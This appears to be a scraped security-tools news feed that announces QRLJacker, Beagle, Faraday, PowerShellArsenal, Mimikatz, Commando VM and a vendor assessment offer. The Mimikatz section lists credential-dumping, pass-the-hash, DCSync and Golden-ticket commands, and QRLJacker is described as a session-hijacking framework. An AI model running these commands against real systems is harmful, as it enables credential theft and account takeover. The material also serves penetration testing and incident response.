QRLJacker v2.0 – QRLJacking Exploitation Framework

QRLJacker is a highly customizable exploitation framework to demonstrate the "QRLJacking Attack Vector" and to show how easy it is to hijack services that depend on the QR Code as an authentication and login method. Mainly it aims to raise security awareness regarding all the services using the QR Code as the main way to log users in to different services!

Prerequisites before installing:
- Linux or MacOS (not working on Windows)
- Python 3.7+

Installing instructions:
- Update Firefox browser to the latest version.
- Install the latest geckodriver from https://github.com/mozilla/geckodriver/releases and extract the file, then do:
    chmod +x geckodriver
    sudo mv -f geckodriver /usr/local/share/geckodriver
    sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
    sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
- Clone the repo with git clone https://github.com/OWASP/QRLJacking then do cd QRLJacking/QRLJacker
- Install all the requirements with pip install -r requirements.txt
- Now you can run the framework with python3 QrlJacker.py --help

Tested on
- Ubuntu 18.04 Bionic Beaver
- Kali Linux 2018.x and up

Usage

Commandline arguments
  usage: QrlJacker.py [-h] [-r ] [-x ] [--debug] [--dev] [--verbose] [-q]
  optional arguments:
    -h, --help  show this help message and exit
    -r          Execute a resource file (history file).
    -x          Execute a specific command (use ; for multiples).
    --debug     Enables debug mode (Identifying problems easier).
    --dev       Enables development mode (Reloading modules every use).
    --verbose   Enables verbose mode (Display more details).
    -q          Quit mode (no banner).

Main menu help

General commands
  Command          Description
  -------          -----------
  help/?           Show this help menu.
  os               Execute a system command without closing the framework.
  banner           Display banner.
  exit/quit        Exit the framework.

Core commands
  database         Prints the core version and then checks if it's up-to-date.
  debug            Drop into debug mode or disable it. (Making identifying problems easier)
  dev              Drop into development mode or disable it. (Reload modules every use)
  verbose          Drop into verbose mode or disable it. (Make the framework display more details)
  reload/refresh   Reload the modules database.

Resources commands
  history          Display the most important command-line history from the beginning.
  makerc           Save the most important commands entered since start to a file.
  resource <file>  Run the commands stored in a file.

Sessions management commands
  sessions (-h)    Dump session listings and display information about sessions.
  jobs (-h)        Displays and manages jobs.

Module commands
  list/show        List modules you can use.
  use <module>     Use an available module.
  info <module>    Get information about an available module.
  previous         Runs the previously loaded module.
  search <text>    Search for a module by a specific text in its name or in its description.

Module menu help

General commands
  help/?           Show this help menu.
  os <command>     Execute a system command without closing the framework.
  banner           Display banner.
  exit/quit        Exit the framework.

The Core, Resources and Sessions management commands in the module menu are the same as in the main menu.

Module commands
  list/show        List modules you can use.
  options          Displays options for the current module.
  set              Sets a context-specific variable to a value.
  run              Launch the current module.
  use <module>     Use an available module.
  info <module>    Get information about an available module.
  search <text>    Search for a module by a specific text in its name or in its description.
  previous         Sets the previously loaded module as the current module.
  back             Move back from the current context.

Sessions command help menu
  usage: sessions [-h] [-l] [-K] [-s] [-k] [-i]
  optional arguments:
    -h  Show this help message.
    -l  List all captured sessions.
    -K  Remove all captured sessions.
    -s  Search for sessions with a specified type.
    -k  Remove a specified captured session by ID.
    -i  Interact with a captured session by ID.

Jobs command help menu
  usage: jobs [-h] [-l] [-K] [-k]
  optional arguments:
    -h  Show this help message.
    -l  List all running jobs.
    -K  Terminate all running jobs.
    -k  Terminate jobs by job ID or module name.

Taking advantage of the core

Commands autocomplete
The autocomplete feature implemented in this framework is not the usual one you always see; here are some highlights:
- It's designed to fix typos in typed commands to the most similar command with just one tab click, so saerch becomes search and so on, even if you typed any random word similar to a command in this framework.
- For you lazy ones out there like me, it can predict what module you are trying to use by typing any part of it. For example, if you typed use wh and clicked tab, it would be replaced with use grabber/whatsapp and so on. I can see your smile, you are welcome!
- If you typed any wrong command then pressed enter, the framework will tell you the nearest command to what you have typed, which could be the one you really wanted.
- Some less impressive things like autocomplete for options of the current module after the set command, autocomplete for modules after the use and info commands, and finally it converts all uppercase to lowercase automatically just in case you switched cases by mistake while typing.
- Finally, you'll find the normal autocompletion things you were using before, like commands autocompletion and persistent history, etc.

Automation
- As you may have noticed, you can use a resource file from command-line arguments before starting the framework itself, or send commands directly.
- Inside the framework you can use the makerc command like in Metasploit, but this time it only saves the correct important commands.
- There are history and resource commands so you don't need to exit the framework.
- You can execute as many commands as you want at the same time by splitting them with a semicolon, and many more are left to be discovered by yourself.
- Searching for modules in QRLJacker is so easy: you can search for a module by its name, something written in its description or even the author name.

OWASP's links reference
https://www.owasp.org/index.php/QRLJacking
https://www.owasp.org/index.php/OWASP_QRLJacker

Download QRLJacker

Link: http://feedproxy.google.com/~r/PentestTools/~3/juZIlVyrDiM/qrljacker-v20-qrljacking-exploitation.html

[python]Disabling and enabling Windows proxy settings

References:
https://superuser.com/questions/1113796/how-to-run-a-python-script-with-cmd-exe-and-make-it-invisible/1113801
https://stackoverflow.com/questions/31348111/setting-proxy-settings-in-windows-with-python-using-internetsetoption

Requirements
- Disable and enable the proxy without closing Internet Explorer.
- Enable the proxy setting when the auto configuration URL (PAC location) is not available.
- Trigger the script to disable the proxy when your laptop is connected out of office.
- Trigger the script to enable the proxy when your laptop is connected to your domain …

Link: http://cyruslab.net/2019/04/09/pythondisabling-and-enabling-windows-proxy-settings/

Free Cynet Threat Assessment for Mid-sized and Large Organizations

If you cannot see what's happening in your network, your ability to make smart security decisions will suffer. Many vendors offer threat assessment options, but they usually require an investment of time and resources. One vendor out there, Cynet, is offering a no-cost threat assessment to qualifying organizations for a limited time only. Based on more than 72 hours of data collection, the assessment gives organizations the ability to benchmark their security posture against their industry peers and provides actionable insights.

How do you qualify? If your organization has at least 300 endpoints, you can take advantage of this free offer to find out what your exposed attack surfaces are and understand what you can do to respond to attacks currently active in your environment. The assessment includes:
- Live attack indicators such as malware, C&C connections, data exfiltration, phishing link access, user credential theft attempts, etc.
- Attack surfaces on host and application surfaces: unpatched vulnerabilities, risk ranked.
- Benchmark of your security posture in comparison to your industry peers: risk score based on total findings.
- User identity attack surface: risk ranking of user accounts.

Security decision makers can take advantage of this offer to achieve (with no obligation) full visibility into their actual security posture, highlighting what their needs are and providing a clear picture of risk ranking for threats and vulnerabilities. Given that most threat assessments for mid-sized organizations begin at $25 thousand, and considering what the Cynet assessment provides, this is a very attractive offer for the security-conscious organization.

Cynet has heavily focused efforts on research in the threat landscape, especially among its install base, and over the last few months has seen a clear increase in live attacks during new deployments.

Said Cynet CEO and co-founder Eyal Gruner, "We frequently discover live malicious activity in the networks of organizations when we do initial deployment of the Cynet platform. One of our first tasks upon deploying is to identify and remediate these risks."

It is important to note that organizations are almost always unaware of the malicious activity, and additionally, most do not understand the capacity of the attacker's ability to maneuver in stealth mode. This leaves a large gap between what many organizations think is going on in their networks and the actual threat reality, providing them with a false sense of security. With this in mind, the Cynet solution provides a proactive approach to threat assessment and response.

Said Gruner, "We decided to offer this threat assessment to organizations, whether they are Cynet customers or not. We believe that instead of waiting for product deployments, organizations will get more benefit by addressing the issues we typically encounter, up-front and before deploying full-scale."

Educating organizations in cyber security best practices is part of Cynet's mission. Said Gruner, "We want people to realize that the risks are there, even when you don't see them. Security has to be more than just buying a product to say you have it. You need visibility, and results with clear, actionable deductions. At Cynet, we want to help organizations achieve this."

Try Cynet's Free Threat Assessment here.

Link: http://feedproxy.google.com/~r/PentestTools/~3/nSnlxp2L5PU/free-cynet-threat-assessment-for-mid.html

Beagle – An Incident Response And Digital Forensics Tool Which Transforms Security Logs And Data Into Graphs

Beagle is an incident response and digital forensics tool which transforms data sources and logs into graphs. Supported data sources include FireEye HX Triages, Windows EVTX files, SysMon logs and raw Windows memory images. The resulting graphs can be sent to graph databases such as Neo4J or DGraph, or they can be kept locally as Python NetworkX objects.

Beagle can be used directly as a Python library, or through a provided web interface.

The library can be used either as a sequence of functional calls:

  >>> from beagle.datasources import SysmonEVTX
  >>> graph = SysmonEVTX("malicious.evtx").to_graph()
  >>> graph

Or by strictly calling each intermediate step of the data source to graph process:

  >>> from beagle.backends import NetworkX
  >>> from beagle.datasources import SysmonEVTX
  >>> from beagle.transformers import SysmonTransformer
  >>> datasource = SysmonEVTX("malicious.evtx")
  # Transformers take a datasource, and transform each event
  # into a tuple of one or more nodes.
  >>> transformer = SysmonTransformer(datasource=datasource)
  >>> nodes = transformer.run()
  # Transformers output an array of nodes.
  [
    (<SysMonProc> process_guid="{0ad3e319-0c16-59c8-0000-0010d47d0000}"),
    (<File> host="DESKTOP-2C3IQHO" full_path="C:\Windows\System32\services.exe"),
    ...
  ]
  # Backends take the nodes, and transform them into graphs
  >>> backend = NetworkX(nodes=nodes)
  >>> G = backend.graph()
  <networkx.classes.multidigraph.MultiDiGraph at 0x126b887f0>

Graphs are centered around the activity of individual processes, and are meant primarily to help analysts investigate activity on hosts, not between them.

Installation

Docker
Beagle is available as a docker file:

  docker pull yampelo/beagle
  mkdir -p data/beagle
  docker run -v "$PWD/data/beagle":"/data/beagle" -p 8000:8000 yampelo/beagle

Python Package
It is also available as a library. Full API documentation is available on https://beagle-graphs.readthedocs.io

  pip install pybeagle

Configuration
Complete overview of each configuration entry

Any entry in the configuration file can be modified using environment variables that follow the format BEAGLE__{SECTION}__{KEY}. For example, in order to change the VirusTotal API key used when using the docker image, you would use the -e parameter and set the BEAGLE__VIRUSTOTAL__API_KEY variable:

  docker run -v "data/beagle":"/data/beagle" -p 8000:8000 -e "BEAGLE__VIRUSTOTAL__API_KEY=$API_KEY" beagle

Environment variables and directories can be easily defined using docker compose:

  version: "3"
  services:
    beagle:
      image: yampelo/beagle
      volumes:
        - /data/beagle:/data/beagle
      ports:
        - "8000:8000"
      environment:
        - BEAGLE__VIRUSTOTAL__API_KEY=$key$

Web Interface
Beagle's docker image comes with a web interface that wraps around the process of both transforming data into graphs, as well as using them to investigate data.

Uploading Data
The upload form wraps around the graph creation process, and automatically uses NetworkX as the backend. Depending on the parameters required by the data source, the form will either prompt for a file upload, or text input. For example:
- VT API Sandbox Report asks for the hash to graph.
- FireEye HX requires the HX triage.

Any graph created is stored locally in the folder defined under the dir key from the storage section in the configuration. This can be modified by setting the BEAGLE__STORAGE__DIR environment variable.

Optionally, a comment can be added to any graph to better help describe it.

Each data source will automatically extract metadata from the provided parameter. The metadata and comment are visible later on when viewing the existing graphs of the datasource.

Browsing Existing Graphs
Clicking on a datasource on the sidebar renders a table of all parsed graphs for that datasource.

Graph Interface
Viewing a graph in Beagle provides a web interface that allows analysts to quickly pivot around an incident.

The interface is split into two main parts: the left part contains various perspectives of the graph (Graph, Tree, Table, etc.), and the right part allows you to filter nodes and edges by type, search for nodes, and expand a node's properties. It also allows you to undo and redo operations you perform on the graph.

Any element in the graph that has a divider above it is collapsible.

Inspecting Nodes and Edges
Nodes in the graph display the first 15 characters of a specific field. For example, for a process node, this will be the process name. Edges simply show the edge type.

A single click on a node or edge will focus that node and display its information in the "Node Info" panel on the right sidebar.

Focusing on a Node
Focusing on an Edge

Expanding Neighbours
A double click on a node will pull in any neighbouring nodes. A neighbouring node is any node connected to the clicked-on node by an edge. If there are no neighbors to be pulled in, no change will be seen in the graph.

This is regardless of direction. That means that a parent process or a child process could be pulled in when double clicking on a node. Beagle will only pull in 25 nodes at a time.

Hiding Nodes
A long single click on a node will hide it from the graph, as well as any edges that depend on it.

Running Mutators
Right clicking on a node exposes a context menu that allows you to run graph mutators. Mutators are functions which take the graph state, and return a new state.

Two extremely useful mutators are:
- Backtracking a node: Find the sequence of nodes and edges that led to the creation of this node. Backtracking a process node will show its process tree.
- Expanding all descendants: From the current node, show every node that has this node as an ancestor. Expanding a process node will show every child process node it spawned, any file it may have touched, and pretty much every activity that happened as a result of this node.

Backtracking a node
Backtracking a node is extremely useful, and is similar to tracing the root cause of an infection in log files.

Expanding Node Descendants
Expanding a node's descendants allows you to immediately view everything that happened because of this node. This action reveals the subgraph rooted at the selected node.

Toggling Node and Edge Types
Sometimes a node or edge type might not be relevant to the current incident; you can toggle edge and node types on and off. As soon as the type is toggled, the nodes or edges of that type are removed from the visible graph. Toggling a node type off prevents that node type from being used when using mutators, or when pulling in neighbours.

Undo/Redo Action and Reset
Any action in the graph is immediately reversible! Using the undo/redo buttons you can revert any action you perform. The reset button sets the graph state to when it loaded, saving you a refresh.

Graph Perspectives
As you change the graph's current state using the above actions, you might also want to view the current set of visible nodes and edges in a different perspective. The tabs at the top of the graph screen allow you to transform the data into a variety of views:
- Graph (default perspective)
- Tree
- Table
- Timeline
- Markdown
Each of the perspectives supports focusing on nodes by clicking on them.

Python Library
The graph generation process can be performed programmatically using the Python library.
The graph generation process is made up of three steps:
1. DataSource classes parse and yield events one by one.
2. Transformer classes take those inputs, and transform them into various Node classes such as Process.
3. Backend classes take the array of nodes, place them into a graph structure, and send them to a desired location.

The Python package can be installed via pip:

  pip install pybeagle

Creating a graph requires chaining these together. This can be done for you using the to_graph() function:

  from beagle.datasources import HXTriage
  # By default, using the to_graph() class uses NetworkX and the first transformer.
  G = HXTriage('test.mans').to_graph()
  <networkx.classes.multidigraph.MultiDiGraph at 0x12700ee10>

It can also be done explicitly at each step. Using the functional calls, you can also define which Backend you wish to use, for example, to send data to DGraph:

  from beagle.datasources import HXTriage
  from beagle.backends import DGraph
  from beagle.transformers import FireEyeHXTransformer
  # The data will be sent to the DGraph instance configured in the
  # configuration file
  backend = HXTriage('test.mans').to_graph(backend=DGraph)
  # Can also specify the transformer
  backend = HXTriage('test.mans').to_transformer(transformer=FireEyeHXTransformer).to_graph(backend=DGraph)

When calling the to_graph or to_transformer methods, you can pass in any arguments to those classes:

  from beagle.datasources import HXTriage
  from beagle.backends import Graphistry
  # Send to graphistry, anonymize the data first, and return the URL
  graphistry_url = HXTriage('test.mans').to_graph(backend=Graphistry, anonymize=True, render=False)

You can also manually invoke each step in the above process, accessing the intermediary outputs. If you want to manually call each step, you will need to ensure that the Transformer class instance is compatible with the output of the provided DataSource class. All Backends are compatible with all Transformers. Each data source defines the list of transformers it is compatible with, and this can be accessed via the .transformers attribute:

  >>> from beagle.datasources import HXTriage
  >>> HXTriage.transformers
  [beagle.transformers.fireeye_hx_transformer.FireEyeHXTransformer]

  >>> from beagle.backends import NetworkX
  >>> from beagle.datasources import HXTriage
  >>> from beagle.transformers import FireEyeHXTransformer
  >>> datasource = HXTriage("test.mans")
  >>> transformer = FireEyeHXTransformer(datasource=datasource)
  >>> nodes = transformer.run()
  >>> backend = NetworkX(nodes=nodes)
  >>> G = backend.graph()

Controlling Edge Generation
By default, edges are not condensed; that means that if a process node u writes to a file node v 5000 times, you will have 5000 edges between those nodes. Sometimes, especially when trying to visualize the data, this may overwhelm an analyst.

You can condense all 5000 edges into a single edge for that type of action (wrote, in this case) by passing the backend class the consolidate_edges=True parameter. By default, the web interface will consolidate the edges.

Documentation
- REST API Overview
- Configuration
- Development
- Design Logic

Download Beagle
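The three-step pipeline and the backtrack/descendants mutators described above, as an added stand-alone example (not Beagle's code or API; every class and function name here is hypothetical): a minimal DataSource -> Transformer -> Backend chain over constructed Sysmon-like events, showing the consolidate_edges behaviour for the 5000-writes case and mutators that honour a toggled-off node type.

```python
from collections import Counter, defaultdict, deque

# Constructed sample events (hypothetical Sysmon-like records, not real telemetry):
# explorer.exe -> winword.exe -> cmd.exe -> powershell.exe, and powershell.exe
# writes the same file 5000 times, the case the README uses for edge consolidation.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "guid": "P1", "image": "explorer.exe", "parent": None},
    {"type": "ProcessCreate", "guid": "P2", "image": "winword.exe", "parent": "P1"},
    {"type": "ProcessCreate", "guid": "P3", "image": "cmd.exe", "parent": "P2"},
    {"type": "ProcessCreate", "guid": "P4", "image": "powershell.exe", "parent": "P3"},
] + [{"type": "FileWrite", "guid": "P4", "path": r"C:\Users\u\out.bin"} for _ in range(5000)]


class ListDataSource:
    """DataSource step: parse a source and yield events one by one."""

    def __init__(self, records):
        self._records = records

    def events(self):
        yield from self._records


class SysmonLikeTransformer:
    """Transformer step: turn each event into typed nodes and (u, edge_type, v) edges.
    A node is a (type, key) tuple; labels map each node to its display field."""

    def __init__(self, datasource):
        self.datasource = datasource

    def run(self):
        labels, edges = {}, []
        for ev in self.datasource.events():
            proc = ("Process", ev["guid"])
            if ev["type"] == "ProcessCreate":
                labels[proc] = ev["image"]
                if ev["parent"] is not None:
                    edges.append((("Process", ev["parent"]), "Launched", proc))
            elif ev["type"] == "FileWrite":
                target = ("File", ev["path"])
                labels.setdefault(target, ev["path"])
                edges.append((proc, "Wrote", target))
        return labels, edges


class DictBackend:
    """Backend step: place nodes and edges into an adjacency structure. With
    consolidate_edges=True, repeated edges of one type become a single counted edge."""

    def __init__(self, labels, edges, consolidate_edges=False):
        self.labels, self.edges = labels, edges
        self.consolidate_edges = consolidate_edges

    def graph(self):
        adj = defaultdict(list)  # u -> [(v, edge_type, count)]
        if self.consolidate_edges:
            for (u, etype, v), n in Counter(self.edges).items():
                adj[u].append((v, etype, n))
        else:
            for u, etype, v in self.edges:
                adj[u].append((v, etype, 1))
        return {"labels": self.labels, "adj": dict(adj)}


def to_graph(records, consolidate_edges=False):
    """Chain the three steps, like calling a datasource's to_graph()."""
    labels, edges = SysmonLikeTransformer(ListDataSource(records)).run()
    return DictBackend(labels, edges, consolidate_edges=consolidate_edges).graph()


def edge_count(graph):
    return sum(len(outs) for outs in graph["adj"].values())


def backtrack(graph, node):
    """Mutator: the chain of nodes that led to this node, root first (a process tree)."""
    parents = {}
    for u, outs in graph["adj"].items():
        for v, _, _ in outs:
            parents.setdefault(v, u)
    chain, cur, seen = [], node, {node}
    while cur in parents and parents[cur] not in seen:  # seen set cuts any cycle
        cur = parents[cur]
        seen.add(cur)
        chain.append(cur)
    return chain[::-1]


def descendants(graph, node, hidden_types=frozenset()):
    """Mutator: every node reachable from `node`; toggled-off node types are skipped."""
    seen, queue = set(), deque([node])
    while queue:
        for v, _, _ in graph["adj"].get(queue.popleft(), []):
            if v[0] not in hidden_types and v not in seen:
                seen.add(v)
                queue.append(v)
    return seen
```

Run to_graph(SAMPLE_EVENTS) with and without consolidate_edges=True and compare edge_count() to see the 5000 "Wrote" edges collapse into one counted edge.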

Link: http://www.kitploit.com/2019/04/beagle-incident-response-and-digital.html

Faraday v3.7 – Collaborative Penetration Test and Vulnerability Management Platform

Here are the main new features and improvements in Faraday v3.7:

Now you can include images to explain vulnerability steps, add tables and code, and we also support:
- Title
- Bold and italic typography
Click here to find out how to configure Markdown in Faraday.

New vuln preview
With Faraday v3.7 you don't have to click "edit" to view your vuln. Just click on it and you will see all the information you need. This improvement allows you to have an easy preview of all the vulns in the status report.

Refine your searches for better automation
Custom fields were included on Searcher, helping you find and act upon all the elements you need faster. With this new function, you can search vulns by different kinds of information relevant to you.

Download Faraday v3.7

Link: http://feedproxy.google.com/~r/PentestTools/~3/oLcdNOwS8pg/faraday-v37-collaborative-penetration.html

PowerShellArsenal – A PowerShell Module Dedicated To Reverse Engineering

PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code, perform .NET malware analysis, analyze/scrape memory, parse file formats and memory structures, obtain internal system information, etc. PowerShellArsenal is comprised of the following tools:

Disassembly
Disassemble native and managed code.
- Get-CSDisassembly: Disassembles a byte array using the Capstone Engine disassembly framework.
- Get-ILDisassembly: Disassembles a raw MSIL byte array passed in from a MethodInfo object in a manner similar to that of Ildasm.

MalwareAnalysis
Useful tools when performing malware analysis.
- New-FunctionDelegate: Provides an executable wrapper for an X86 or X86_64 function.
- Invoke-LoadLibrary: Loads a DLL into the current PowerShell process.
- New-DllExportFunction: Creates an executable wrapper delegate around an unmanaged, exported function.
- Get-HostsFile: Parses a HOSTS file.
- New-HostsFileEntry: Replace or append an entry to a HOSTS file.
- Remove-HostsFileEntry: Remove an entry or series of entries from a HOSTS file.
- Get-AssemblyStrings: Output all strings from a .NET executable.
- Get-AssemblyResources: Extract managed resources from a .NET assembly.
- Remove-AssemblySuppressIldasmAttribute: Strips a SuppressIldasmAttribute attribute from a .NET assembly.
- Get-AssemblyImplementedMethods: Returns all methods in an assembly that are implemented in MSIL.

MemoryTools
Inspect and analyze process memory.
- Get-ProcessStrings: Outputs all printable strings from the user-mode memory of a process.
- Get-VirtualMemoryInfo: A wrapper for kernel32!VirtualQueryEx.
- Get-ProcessMemoryInfo: Retrieve virtual memory information for every unique set of pages in user memory. This function is similar to the !vadump WinDbg command.
- Get-StructFromMemory: Marshals data from an unmanaged block of memory in an arbitrary process to a newly allocated managed object of the specified type.

Parsers
Parse file formats and in-memory structures.
- Get-PE: An on-disk and in-memory PE parser and process dumper.
- Find-ProcessPEs: Finds portable executables in memory regardless of whether or not they were loaded in a legitimate fashion.
- Get-LibSymbols: Displays symbolic information from Windows LIB files.
- Get-ObjDump: Displays information about Windows object (OBJ) files.

WindowsInternals
Obtain and analyze low-level Windows OS information.
- Get-NtSystemInformation: A utility that calls and parses the output of the ntdll!NtQuerySystemInformation function. This utility can be used to query internal OS information that is typically not made visible to a user.
- Get-PEB: Returns the process environment block (PEB) of a process.
- Register-ProcessModuleTrace: Starts a trace of loaded process modules.
- Get-ProcessModuleTrace: Displays the process modules that have been loaded since the call to Register-ProcessModuleTrace.
- Unregister-ProcessModuleTrace: Stops the running process module trace.
- Get-SystemInfo: A wrapper for kernel32!GetSystemInfo.

Misc
Miscellaneous helper functions.
- Get-Member: A proxy function used to extend the built-in Get-Member cmdlet. It adds the '-Private' parameter allowing you to display non-public .NET members.
- Get-Strings: Dumps strings from files in both Unicode and ASCII. This cmdlet replicates the functionality of strings.exe from Sysinternals.
- ConvertTo-String: Converts the bytes of a file to a string that has a 1-to-1 mapping back to the file's original bytes. ConvertTo-String is useful for performing binary regular expressions.
- Get-Entropy: Calculates the entropy of a file or byte array.

Lib
Libraries required by some of the RE functions.
- Capstone: The Capstone disassembly engine C# binding.
- De4dot: A powerful .NET deobfuscation and .NET PE parsing library.
- PSReflect: A module used to easily define in-memory enums, structs, and Win32 functions.
- Formatters: ps1xml files used to format the output of various PowerShellArsenal functions.

License
The PowerShellArsenal module and all individual scripts are under the BSD 3-Clause license unless explicitly noted otherwise.

Usage
Refer to the comment-based help in each individual script for detailed usage information.

To install this module, drop the entire PowerShellArsenal folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.

The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"

To use the module, type Import-Module PowerShellArsenal
To see the commands imported, type Get-Command -Module PowerShellArsenal

If you're running PowerShell v3 and you want to remove the annoying 'Do you really want to run scripts downloaded from the Internet' warning, once you've placed PowerShellArsenal into your module path, run the following one-liner:

  $Env:PSModulePath.Split(';') | % { if ( Test-Path (Join-Path $_ PowerShellArsenal) ) {Get-ChildItem $_ -Recurse | Unblock-File} }

For help on each individual command, Get-Help is your friend.

Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.

Script Style Guide
For all contributors and future contributors to PowerShellArsenal, I ask that you follow this style guide when writing your scripts/modules.
- Avoid Write-Host at all costs. PowerShell functions/cmdlets are not command-line utilities! Pull requests containing code that uses Write-Host will not be considered. You should output custom objects instead. For more information on creating custom objects, read these articles:
  http://blogs.technet.com/b/heyscriptingguy/archive/2011/05/19/create-custom-objects-in-your-powershell-script.aspx
  http://technet.microsoft.com/en-us/library/ff730946.aspx
- If you want to display relevant debugging information to the screen, use Write-Verbose. The user can always just tack on '-Verbose'.
- Always provide descriptive, comment-based help for every script. Also, be sure to include your name and a BSD 3-Clause license (unless there are extenuating circumstances that prevent the application of the BSD license).
- Make sure all functions follow the proper PowerShell verb-noun agreement. Use Get-Verb to list the default verbs used by PowerShell. Exceptions to supported verbs will be considered on a case-by-case basis.
- I prefer that variable names be capitalized and be as descriptive as possible.
- Provide logical spacing in between your code. Indent your code to make it more readable.
- If you find yourself repeating code, write a function.
- Catch all anticipated errors and provide meaningful output. If you have an error that should stop execution of the script, use 'Throw'. If you have an error that doesn't need to stop execution, use Write-Error.
- If you are writing a script that interfaces with the Win32 API, try to avoid compiling C# inline with Add-Type. Try to use the PSReflect module, if possible.
- Do not use hardcoded paths. A script should be usable right out of the box. No one should have to modify the code unless they want to.
- PowerShell v2 compatibility is highly desired.
- Use positional parameters and make parameters mandatory when it makes sense to do so. For example, I'm looking for something like the following: [Parameter(Position = 0, Mandatory = $True)]
- Don't use any aliases unless it makes sense for receiving pipeline input. They make code more difficult to read for people who are unfamiliar with a particular alias.
- Try not to let commands run on for too long. For example, a pipeline is a natural place for a line break.
- Don't go overboard with inline comments. Only use them when certain aspects of the code might be confusing to a reader.
- Rather than using Out-Null to suppress unwanted/irrelevant output, save the unwanted output to $null. Doing so provides a slight performance enhancement.
- Use default values for your parameters when it makes sense. Ideally, you want a script that will work without requiring any parameters.
- Explicitly state all required and optional dependencies in the comment-based help for your function. All library dependencies should reside in the 'Lib' folder.
- If a script creates complex custom objects, include a ps1xml file that will properly format the object's output. ps1xml files are stored in Lib\Formatters.

Download PowerShellArsenal

Link: http://www.kitploit.com/2019/04/powershellarsenal-powershell-module.html

Mimikatz v2.2.0 – A Post-Exploitation Tool to Extract Plaintexts Passwords, Hash, PIN Code from Memory

mimikatz is a tool I've made to learn C and make some experiments with Windows security. It's now well known to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

But that's not all! Crypto, Terminal Server, Events, ... lots of information in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes).

If you don't want to build it, binaries are available on https://github.com/gentilkiwi/mimikatz/releases

Quick usage
  log
  privilege::debug

sekurlsa
  sekurlsa::logonpasswords
  sekurlsa::tickets /export
  sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos
  kerberos::list /export
  kerberos::ptt c:\chocolate.kirbi
  kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto
  crypto::capi
  crypto::cng
  crypto::certificates /export
  crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
  crypto::keys /export
  crypto::keys /machine /export

vault & lsadump
  vault::cred
  vault::list
  token::elevate
  vault::cred
  vault::list
  lsadump::sam
  lsadump::secrets
  lsadump::cache
  token::revert
  lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Build
mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
- for mimikatz and mimilib: Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914)
- for mimikatz driver, mimilove (and ddk2003 platform): Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even the GIT incorporated in Visual Studio 2013 =)

Synchronize!
GIT URL is: https://github.com/gentilkiwi/mimikatz.git
SVN URL is: https://github.com/gentilkiwi/mimikatz/trunk
ZIP file is: https://github.com/gentilkiwi/mimikatz/archive/master.zip

Build the solution
After opening the solution, Build / Build Solution (you can change architecture). mimikatz is now built and ready to be used! (Win32 / x64)
You can have error MSB3073 about _build_.cmd and mimidrv; it's because the driver cannot be built without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK.

ddk2003
With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies). For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.
Follow instructions:
http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

Licence
CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/

mimikatz needs coffee to be developed:
ETH: 0x3a56af999b5e68f9e6e0a7dce1833efefad5b470
BTC: 1C6bubazp9xq3BfYiHvsqP1sEhFYykUDo5
PayPal: https://www.paypal.me/delpy/

Author
Benjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
DCSync function in lsadump module was co-written with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )

This is a personal development, please respect its philosophy and don't use it for bad things!

Download Mimikatz

Link: http://www.kitploit.com/2019/04/mimikatz-v220-post-exploitation-tool-to.html

Commando VM – The First of Its Kind Windows Offensive Distribution

Welcome to CommandoVM: a fully customized, Windows-based security distribution for penetration testing and red teaming.

Installation (Install Script)

Requirements
  Windows 7 Service Pack 1 or Windows 10
  60 GB hard drive
  2 GB RAM

Instructions
  1. Create and configure a new Windows virtual machine.
  2. Ensure the VM is updated completely. You may have to check for updates, reboot, and check again until no more remain.
  3. Take a snapshot of your machine!
  4. Download and copy install.ps1 onto your newly configured machine.
  5. Open PowerShell as an Administrator.
  6. Enable script execution by running the following command:
       Set-ExecutionPolicy Unrestricted
  7. Finally, execute the installer script as follows:
       .\install.ps1
     You can also pass your password as an argument: .\install.ps1 -password <password>

The script sets up the Boxstarter environment and proceeds to download and install the Commando VM environment. You will be prompted for the administrator password in order to automate host restarts during installation. If you do not have a password set, hitting Enter when prompted will also work.

Two things to be aware of: Set-ExecutionPolicy Unrestricted as written changes the machine-wide policy (acceptable on a dedicated attack VM; add -Scope Process if you only want it relaxed for the installer session), and a password passed on the command line ends up in the PowerShell command history.

Installing a new package
Commando VM uses the Chocolatey Windows package manager, so installing a new package is easy. For example, enter the following command as Administrator to deploy GitHub Desktop on your system:
  cinst github

Staying up to date
Type the following command to update all of the packages to the most recent version:
